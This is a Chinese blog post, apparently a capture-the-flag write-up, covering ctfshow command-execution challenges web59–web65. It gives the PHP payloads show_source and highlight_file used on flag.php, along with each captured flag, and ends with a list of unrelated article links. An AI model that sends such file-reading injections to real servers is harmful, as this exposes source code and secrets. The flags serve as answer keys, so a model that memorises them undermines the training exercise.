当前位置: 首页 > news >正文

ctfshow-web入门-命令执行(web59-web65)

目录

1、web59

2、web60

3、web61

4、web62

5、web63

6、web64

7、web65


都是使用 highlight_file 或者 show_source

 

1、web59

直接用上一题的 payload:

c=show_source('flag.php');

拿到 flag:ctfshow{9e058a62-f37d-425e-9696-43387b0b3629}

2、web60

过滤更多

还是使用 show_source()

c=show_source("flag.php");

拿到 flag:ctfshow{b275a543-cc93-4454-add2-c5f1826ddaca}

3、web61

这里 copy 、rename 也禁用了

还是使用高亮显示源码的函数 

c=show_source("flag.php");

拿到 flag:ctfshow{905ea953-3623-4eb7-b3e3-5618db3b4cf7}

4、web62

还是用上一题的 payload:

c=show_source("flag.php");

拿到 flag:ctfshow{28bfa41b-3dad-4eef-a12e-cd88d644f620}

5、web63

c=highlight_file("flag.php");

ctfshow{745aa683-6a56-4793-a8d3-390249d6fc70}

6、web64

c=highlight_file("flag.php");

ctfshow{42817ff2-d650-430a-84e2-30b793c921b4}

7、web65

c=highlight_file("flag.php");

ctfshow{48c4f136-5c87-426b-812b-156a20870c11}

http://www.lryc.cn/news/387688.html

相关文章:

  • Websocket在Java中的实践——最小可行案例
  • python请求报错::requests.exceptions.ProxyError: HTTPSConnectionPool
  • 【Unity】Excel配置工具
  • 001 线性查找(lua)
  • 数据结构之链表
  • 【小工具】 Unity相机宽度适配
  • centos误删yum和python
  • WP黑格导航主题BlackCandy
  • elasticsearch底层核心组件
  • EasyExcel数据导入
  • 20240630 每日AI必读资讯
  • 第十一章 Qt的模型视图
  • 力扣 单词规律
  • 10款好用不火的PC软件,真的超好用!
  • Windows怎么实现虚拟IP
  • 【计算机网络】HTTP——基于HTTP的功能追加协议(个人笔记)
  • 【多媒体】Java实现MP4视频播放器【JavaFX】【音视频播放】
  • 2024 Parallels Desktop for Mac 功能介绍
  • 颍川韩氏,来自战国七雄韩国的豪族
  • Spring boot中如何使用Thymeleaf模板
  • 单片机学习(14)--DS18B20温度传感器
  • ue 材质贴图Tiling repeat
  • 【图像超分辨率】一个简单的总结
  • WEB与低代码:B/S架构在开发中的应用与优势
  • 内容营销专家刘鑫炜揭秘:姜萍一夜暴红背后的品牌传播密码
  • 安装VEX外部编辑器
  • ISO 19110全局要求类/req/global/bound-association-role要求的详细解释
  • 武汉凯迪正大等简述电缆电容检测:原理、应用与重要性
  • python调用阿里云OSS对象存储
  • 530、二叉搜索树的最小绝对差